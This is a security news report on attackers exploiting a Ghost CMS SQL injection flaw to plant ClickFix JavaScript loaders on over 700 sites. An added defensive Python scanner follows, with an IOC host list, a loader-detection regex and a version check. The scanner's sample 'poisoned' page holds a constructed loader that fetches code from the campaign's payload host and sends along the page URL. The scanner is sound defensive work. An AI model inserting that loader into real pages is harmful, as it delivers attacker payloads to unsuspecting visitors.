Ghost CMS CVE-2026-26980 Exploited: 700+ Sites Hit in ClickFix Attacks
Threat actors are actively exploiting a critical SQL injection vulnerability in Ghost CMS (CVE-2026-26980, CVSS 9.4) to compromise over 700 websites across multiple sectors including universities, blockchain, AI, SaaS, security research, media, and financial technology. QiAnXin XLab researchers discovered the campaign, which was first detected on May 7, 2026, and involves attackers leveraging the flaw in Ghost's Content API to steal admin API keys without authorization. The vulnerability, initially discovered by Anthropic using Claude and patched in February 2026 in version 6.19.1, enables unauthenticated attackers to read arbitrary database data and subsequently modify published content.
The attack chain begins with obtaining the target site's Admin API Key, then uses Ghost's Admin API to inject malicious JavaScript loaders at the bottom of pages en masse. This "large-scale poisoning" campaign facilitates ClickFix attacks, in which visitors encounter fake CAPTCHA prompts designed to trick them into executing malicious actions. The injected JavaScript functions as a two-stage loader, retrieving the main payload at runtime from the external URL clo4shara[.]xyz/11z77u3.php. Security teams investigating potential exposure can use tools like our browser fingerprint test to check whether their browser environment has been profiled by such attack infrastructure.
The PHP payload server is powered by Adspect, a commercial cloaking service that collects browser fingerprinting data and returns instructions based on the victim's characteristics. This ensures that only genuine human visitors receive the malicious payload, while security scanners and crawlers see benign content. The script supports 19 different commands for remote control, including redirection, popups, and file downloads. Organizations running Ghost CMS instances should immediately update to version 6.19.1 or later and audit their admin API keys for potential compromise. Users concerned that their credentials may have been exposed in related breaches can use our email breach checker to verify their exposure status.
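The following is an added defender-side example, not code from the article, from Ghost, or from the researchers cited above. It covers both the poisoning described in the attack-chain paragraph and the patch advice in the last paragraph: it scans a site's rendered HTML for script tags that point at the campaign's payload host (taken from the article, defanged there as clo4shara[.]xyz), applies a heuristic for inline scripts that load code at runtime, and checks a reported Ghost version against the 6.19.1 fix. The sample pages are constructed, and the loader heuristic and `scan_url` wrapper are assumptions of this example rather than anything the article specifies.

```python
"""Scan Ghost-rendered pages for the injected loader and check the version.

Added example (not from the article, Ghost, or QiAnXin XLab). Standard
library only, so it runs offline on the constructed sample pages below.
"""
import re
from html.parser import HTMLParser
from urllib.request import urlopen

IOC_HOSTS = {"clo4shara.xyz"}      # payload host named in the article (defanged there)
PATCHED_VERSION = (6, 19, 1)       # first fixed Ghost release per the article

# Heuristic (an assumption of this example): inline code that builds a script
# element or pulls code over the network at runtime looks like a stage-one loader.
LOADER_PATTERN = re.compile(
    r"createElement\(\s*['\"]script['\"]\s*\)|\bfetch\(|XMLHttpRequest|\beval\(",
    re.IGNORECASE,
)


class _ScriptCollector(HTMLParser):
    """Collect (src, inline_body) for every <script> element in a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:        # inside a <script> body
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src = None
            self._buf = None


def _host_of(url):
    """Extract the host from an absolute or protocol-relative URL."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url.strip())
    return m.group(1).lower() if m else None


def scan_html(html):
    """Return a list of (finding_type, evidence); empty means nothing suspicious."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src and _host_of(src) in IOC_HOSTS:
            findings.append(("ioc_script_src", src))
        if any(host in body for host in IOC_HOSTS):
            findings.append(("ioc_in_inline_script", body.strip()[:80]))
        elif not src and LOADER_PATTERN.search(body):
            findings.append(("runtime_loader_heuristic", body.strip()[:80]))
    return findings


def is_vulnerable_version(version):
    """True if a Ghost version string is older than the patched 6.19.1 release."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts < PATCHED_VERSION


def scan_url(url):
    """Fetch a live page and scan it (network; not used by the sample run)."""
    with urlopen(url, timeout=10) as resp:
        return scan_html(resp.read().decode("utf-8", errors="replace"))


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><body><h1>Post</h1>
<script src="https://example.org/static/app.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>"""

POISONED_PAGE = """<html><body><h1>Post</h1>
<p>Legitimate content.</p>
<script>
  var s = document.createElement('script');
  s.src = 'https://clo4shara.xyz/11z77u3.php?u=' + encodeURIComponent(location.href);
  document.body.appendChild(s);
</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("poisoned", POISONED_PAGE)):
        print(name, scan_html(page))
    print("6.18.2 vulnerable:", is_vulnerable_version("6.18.2"))
```

Run `scan_url` against a handful of your own published post URLs, since the injection lands in the rendered page rather than in a single template file; any `ioc_*` finding is a confirmed hit, while `runtime_loader_heuristic` needs a human look because legitimate analytics snippets also create script elements.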